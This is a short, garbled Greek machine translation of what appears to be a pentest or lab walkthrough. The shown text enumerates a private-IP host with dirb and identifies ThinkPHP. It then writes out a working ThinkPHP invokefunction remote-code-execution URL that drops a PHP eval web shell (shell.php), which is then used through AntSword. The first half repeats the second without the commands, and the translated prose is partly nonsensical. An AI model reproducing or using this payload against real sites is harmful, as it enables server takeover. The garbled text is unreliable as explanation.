Κοινή χρήση τεχνολογίας

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

Πίνακας περιεχομένων

Διαχείριση εξωτερικού δικτύου

Ας το ανατινάξουμε πρώτα για να δούμε αν υπάρχει τρόπος επίθεσης.

Δοκίμασα την ύποπτη διαδρομή και διαπίστωσα ότι ήταν το πλαίσιο thinkphp, ήξερα επίσης την έκδοση, οπότε ας παλέψουμε την επόμενη μέρα.

γράψτε στο php

​Επεξεργαστείτε και γράψτε στο php με επιτυχία, απλά αποκτήστε το την επόμενη μέραΕπεξεργασία

Μυρμήγκι σπαθί rce δοκιμάστε σύνδεσμο

Επιτυχής διαχείριση

---

Διαχείριση εξωτερικού δικτύου

Ας το ανατινάξουμε πρώτα για να δούμε αν υπάρχει τρόπος επίθεσης.

Μπορείτε να δοκιμάσετε dirsearch, dirb, gobuster και άλλα εργαλεία

dirb http://192.168.20.130/

Δοκίμασα την ύποπτη διαδρομή και διαπίστωσα ότι ήταν το πλαίσιο thinkphp, ήξερα επίσης την έκδοση, οπότε ας παλέψουμε την επόμενη μέρα.

γράψτε στο php

http://192.168.20.130/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>

Γράφτηκε με επιτυχία σε php, είναι εύκολο να το αποκτήσετε.

http://192.168.20.130/public/shell.php

Μυρμήγκι σπαθί rce δοκιμάστε σύνδεσμο

Επιτυχής διαχείριση